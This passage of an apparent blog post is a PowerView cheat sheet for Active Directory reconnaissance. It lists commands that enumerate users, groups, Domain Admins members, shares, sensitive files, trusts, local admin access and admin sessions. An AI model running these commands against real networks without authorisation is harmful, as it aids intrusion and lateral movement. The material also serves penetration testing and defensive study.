Administrators</span></div></li><li><div><span style="font-family: inherit;">Shares</span></div></li></ol><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">[*] Import Powerview </span></div><div><span style="font-family: inherit;"><a href="https://github.com/PowerShellMafia/PowerSploit">https://github.com/PowerShellMafia/PowerSploit</a></span></div><div><span style="font-family: inherit;"> </span></div>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">[*] Get current domain</span><span style="font-size: 12pt;"></span></span></p><span style="font-family: inherit;"><span style="font-size: 12pt;"> </span></span></div><div><span style="font-family: inherit;"><span style="font-size: 12pt;">1.</span><b><i><span style="font-size: 12pt;"> Get-NetDomain</span></i></b><span style="font-size: 12pt;"> </span><span style="font-size: 12pt;"></span> </span></div><div><span style="font-family: inherit;"><span style="font-size: 12pt;"> </span></span></div><div><span style="font-family: inherit;"><span style="font-size: 12pt;"> </span></span></div><div><span style="font-family: inherit;"><span style="font-size: 12pt;">[*] Get object of another domain</span><span style="font-size: 12pt;"></span></span>
<p class="MsoNormal" style="line-height: normal; margin-left: 18pt; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-indent: -18pt;"><span style="font-family: inherit;"><span style="font-size: 12pt;">1.</span><span style="font-size: 7pt;"><i><b> </b></i></span><b><i><span style="font-size: 12pt;">Get-NetDomain -Domain</span></i></b><span style="font-size: 12pt;"> <a href="https://www.blogger.com/"><b><i><span style="color: blue;">test.dc.com</span></i></b></a></span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;"> </span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">[*] Get domain SID for the current domain</span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-left: 18pt; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-indent: -18pt;"><span style="font-family: inherit;"><span style="font-size: 12pt;">1.</span><b><i><span style="font-size: 12pt;"> Get-DomainSID</span></i></b><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;"> </span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">[*] Get domain policy for the current domain</span><span style="font-size: 12pt;"></span></span></p>
<span style="font-family: inherit;"><br /></span></div><span style="font-family: inherit;"><span style="font-size: 12pt;"><span style="mso-list: Ignore;">1.</span></span><b><i><span style="font-size: 12pt;"> Get-DomainPolicy</span></i></b><span style="font-size: 12pt;"></span><br /><span style="font-size: 12pt;"><span style="mso-list: Ignore;">2.</span></span><b><i><span style="font-size: 12pt;"> Get-DomainPolicy."system access"</span></i></b><span style="font-size: 12pt;"></span><br /></span><div>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;"> </span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">[*] Get Domain Controllers for the current domain</span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-left: 18pt; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-indent: -18pt;"><span style="font-family: inherit;"><span style="font-size: 12pt;">1.</span><span style="font-size: 7pt;"><i><b> </b></i></span><b><i><span style="font-size: 12pt;">Get-NetDomainController</span></i></b><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-left: 36pt; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><b><i><span style="font-size: 12pt;"> </span></i></b><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">[*] Get a list of users in the current domain</span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoListParagraphCxSpFirst" style="line-height: normal; margin-left: 18pt; mso-add-space: auto; mso-list: l3 level1 lfo4; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-indent: -18pt;"><span style="font-family: inherit;"><span style="font-size: 12pt;"><span style="mso-list: Ignore;">1.<span style="font-feature-settings: normal; font-kerning: auto; font-language-override: normal; font-optical-sizing: auto; font-size-adjust: none; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;"> </span></span></span><b><i><span style="font-size: 12pt;">Get-NetUser</span></i></b><span style="font-size: 12pt;"></span></span><span style="font-family: inherit;"><b><i><span style="font-size: 12pt;"></span></i></b><span style="font-size: 12pt;"></span></span>
</p><p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;"><br /></span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">[*] Get list of all properties for users in the current domain</span><span style="font-size: 12pt;"></span></span></p>
<span style="font-family: inherit;"><br /></span></div><div style="text-align: left;"><span style="font-family: inherit;"><span style="font-size: 12pt;"><span style="mso-list: Ignore;">1.<span style="font-feature-settings: normal; font-kerning: auto; font-language-override: normal; font-optical-sizing: auto; font-size-adjust: none; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;"> </span></span></span><b><i><span style="font-size: 12pt;">Get-UserProperty</span></i></b><br /><span style="font-size: 12pt;"><span style="mso-list: Ignore;">2.<span style="font-feature-settings: normal; font-kerning: auto; font-language-override: normal; font-optical-sizing: auto; font-size-adjust: none; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;"> </span></span></span><b><i><span style="font-size: 12pt;">Get-UserProperty -properties pwdlastset</span></i></b><br /><span style="font-size: 12pt;"><span style="mso-list: Ignore;">3.<span style="font-feature-settings: normal; font-kerning: auto; font-language-override: normal; font-optical-sizing: auto; font-size-adjust: none; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;"> </span></span></span><b><i><span style="font-size: 12pt;">Get-UserProperty -Properties logoncount</span></i></b><br /><span style="font-size: 12pt;"><span style="mso-list: Ignore;">4.<span style="font-feature-settings: normal; font-kerning: auto; font-language-override: normal; font-optical-sizing: auto; font-size-adjust: none; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;"> </span></span></span><b><i><span style="font-size: 12pt;">Get-UserProperty -Properties badpwdcount</span></i></b></span></div><div>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;"> </span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">[*] Search for a particular string in a user's attributes:</span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-left: 18pt; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-indent: -18pt;"><span style="font-family: inherit;"><span style="font-size: 12pt;">1.</span><span style="font-size: 7pt;"> </span><b><i><span style="font-size: 12pt;">Find-UserField -SearchField Description -SearchTerm "built"</span></i></b><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;"> </span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">[*] Get a list of computers in the current domain</span><span style="font-size: 12pt;"></span></span></p>
<span style="font-family: inherit;"><br /></span></div><div style="text-align: left;"><span style="font-family: inherit;"><span style="font-size: 12pt;"><span style="mso-list: Ignore;">1.<span style="font-feature-settings: normal; font-kerning: auto; font-language-override: normal; font-optical-sizing: auto; font-size-adjust: none; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;"> </span></span></span><b><i><span style="font-size: 12pt;">Get-NetComputer</span></i></b><span style="font-size: 12pt;"></span><br /><span style="font-size: 12pt;"><span style="mso-list: Ignore;">2.<span style="font-feature-settings: normal; font-kerning: auto; font-language-override: normal; font-optical-sizing: auto; font-size-adjust: none; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;"> </span></span></span><b><i><span style="font-size: 12pt;">Get-NetComputer -Ping</span></i></b><span style="font-size: 12pt;"></span><br /><span style="font-size: 12pt;"><span style="mso-list: Ignore;">3.<span style="font-feature-settings: normal; font-kerning: auto; font-language-override: normal; font-optical-sizing: auto; font-size-adjust: none; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;"> </span></span></span><b><i><span style="font-size: 12pt;">Get-NetComputer -OperatingSystem "*Server 2012*"</span></i></b><span style="font-size: 12pt;"></span><br /><span style="font-size: 12pt;"><span style="mso-list: Ignore;">4.<span style="font-feature-settings: normal; font-kerning: auto; font-language-override: normal; font-optical-sizing: auto; font-size-adjust: none; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;"> </span></span></span><b><i><span style="font-size: 12pt;">Get-NetComputer -FullData</span></i></b><span style="font-size: 12pt;"></span><br /></span></div><div>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;"> </span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">[*] Get a list of groups in the current domain</span><span style="font-size: 12pt;"></span></span></p>
<span style="font-family: inherit;"><br /></span></div><div style="text-align: left;"><span style="font-family: inherit;"><span style="font-size: 12pt;"><span style="mso-list: Ignore;">1.<span style="font-feature-settings: normal; font-kerning: auto; font-language-override: normal; font-optical-sizing: auto; font-size-adjust: none; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;"> </span></span></span><b><i><span style="font-size: 12pt;">Get-NetGroup</span></i></b><span style="font-size: 12pt;"></span><br /><span style="font-size: 12pt;"><span style="mso-list: Ignore;">2.<span style="font-feature-settings: normal; font-kerning: auto; font-language-override: normal; font-optical-sizing: auto; font-size-adjust: none; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;"> </span></span></span><b><i><span style="font-size: 12pt;">Get-NetGroup -FullData</span></i></b><span style="font-size: 12pt;"></span><br /><span style="font-size: 12pt;"><span style="mso-list: Ignore;">3.<span style="font-feature-settings: normal; font-kerning: auto; font-language-override: normal; font-optical-sizing: auto; font-size-adjust: none; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;"> </span></span></span><b><i><span style="font-size: 12pt;">Get-NetGroup 'Domain Admins'
-FullData</span></i></b><span style="font-size: 12pt;"></span><br /><span style="font-size: 12pt;"><span style="mso-list: Ignore;">4.<span style="font-feature-settings: normal; font-kerning: auto; font-language-override: normal; font-optical-sizing: auto; font-size-adjust: none; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;"> </span></span></span><b><i><span style="font-size: 12pt;">Get-NetGroup *admin*</span></i></b><span style="font-size: 12pt;"></span><br /></span></div><div>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;"> </span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">[*] Get all the members of the Domain Admins group</span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-left: 18pt; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-indent: -18pt;"><span style="font-family: inherit;"><span style="font-size: 12pt;">1.</span><span style="font-size: 7pt;"> </span><b><i><span style="font-size: 12pt;">Get-NetGroupMember -GroupName "Domain Admins" -Recurse</span></i></b><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;"> </span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">[*] Get the group membership for a user</span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-left: 18pt; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-indent: -18pt;"><span style="font-family: inherit;"><span style="font-size: 12pt;">1.</span><span style="font-size: 7pt;"> </span><b><i><span style="font-size: 12pt;">Get-NetGroup -Username "Thanos"</span></i></b><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;"> </span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">[*] List all the local groups on the machine</span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-left: 18pt; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-indent: -18pt;"><span style="font-family: inherit;"><span style="font-size: 12pt;">1.</span><span style="font-size: 7pt;"> </span><b><i><span style="font-size: 12pt;">Get-NetLocalGroup -ComputerName WIN-8542F7P0C5H.dc.com -ListGroups</span></i></b><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;"> </span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">[*] Find shares on hosts in current domain</span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-left: 18pt; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-indent: -18pt;"><span style="font-family: inherit;"><span style="font-size: 12pt;">1.</span><span style="font-size: 7pt;"> </span><b><i><span style="font-size: 12pt;">Invoke-ShareFinder
-Verbose</span></i></b><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-left: 18pt; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-indent: -18pt;"><span style="font-family: inherit;"><span style="font-size: 12pt;"> </span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">[*] Find sensitive files on computers in the doman<br style="mso-special-character: line-break;" />
</span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">1. <b><i>Invoke-FileFinder -Verbose</i></b></span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><b><i><span style="font-size: 12pt;"> </span></i></b><span style="font-size: 12pt;"><br />
<br />
[*] Get all fileservers of the domain<br />
<br />
1.<b><i> Get-NetFileServer</i></b></span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;"> </span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">[*] Get list of GPO in the current domain<br />
<br />
1. <b><i>Get-NetGPO</i></b><br />
2. <b><i>Get-NetGPO | select displayname</i></b><br />
3. <b><i>Get-NetGPO -ComputerName test.dc.com</i></b><br />
<br />
<br />
[*] Get list of OU in the current domain<br />
<br />
1. <b><i>Get-NetOU</i></b><br />
2. <b><i>Get_NetOU -FullData</i></b><br />
<br />
<br />
[*] Get GPO applied on an OU. Read GPOname from gplink attribute from
Get-NetOU<br />
<br />
1.<i><b> </b></i><b><i>Get-NetGPO -GPOname '{6AC1786C-016F-11D2-945F-00C04fB984F9}'</i></b><br />
<br />
<br />
[*] Get a list of all domain trust for the current domain<br style="mso-special-character: line-break;" />
</span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">1.<i><b> </b></i><b><i>Get-NetDomainTrust</i></b><br />
2. <b><i>Get-NetDomainTrust -Domain child.dc.com</i></b><br />
<br />
<br />
[*] Get details about the current forest<br style="mso-special-character: line-break;" />
</span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal" style="line-height: normal; margin-bottom: 0cm; mso-margin-top-alt: auto;"><span style="font-family: inherit;"><span style="font-size: 12pt;">1. <b><i>Get-NetForest</i></b><br />
2. <b><i>Get-Forest -Forest dc1.com<br />
</i></b> <br />
<br />
[*] Get all domains in the current forest<br />
<br />
1. <b><i>Get-NetForestDomain</i></b><br />
2. <b><i>Get-NetForestDomain -Forest dc1.com</i></b><br />
<br />
<br />
[*] Map trusts of a forest<br />
<br />
1. <b><i>Get-NetForestTrust</i></b><br />
2. <b><i>Get-NetForestTrust -Forest dc1.com</i></b><br />
<br />
<br />
[*] Find all machines on the current domain where the current user has
local admin access<br />
<br />
1. <b><i>Find-LocalAdminAccess -Verbose</i></b><br />
<br />
<br />
[*] Find local admins on all machines of the domain<br />
<br />
1. <b><i>Invoke-EnumerateLocalAdmin -Verbose</i></b><br />
<br />
<br />
[*] Find computers where a domain admin has sessions<br />
<br />
1. <b><i>Invoke-UserHunter</i></b><br />
2. <b><i>Invoke-UserHunter -GroupName "RDPUsers"</i></b></span><span style="font-size: 12pt;"></span></span></p>
<p class="MsoNormal"><span style="font-family: inherit;"> </span></p><p class="MsoNormal"><span style="font-family: inherit;">Do share if you like the post. Happy Hacking! 😊 <br /></span></p>
<!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-IN</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="376">
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 9"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="header"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footer"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index heading"/>
<w:LsdException Locked="false" Priority="35" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of figures"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope return"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="line number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="page number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of authorities"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="macro"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="toa heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 5"/>
<w:LsdException Locked="false" Priority="10" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Closing"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Signature"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="true"
UnhideWhenUsed="true" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Message Header"/>
<w:LsdException Locked="false" Priority="11" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Salutation"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Date"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Block Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="FollowedHyperlink"/>
<w:LsdException Locked="false" Priority="22" QFormat="true" Name="Strong"/>
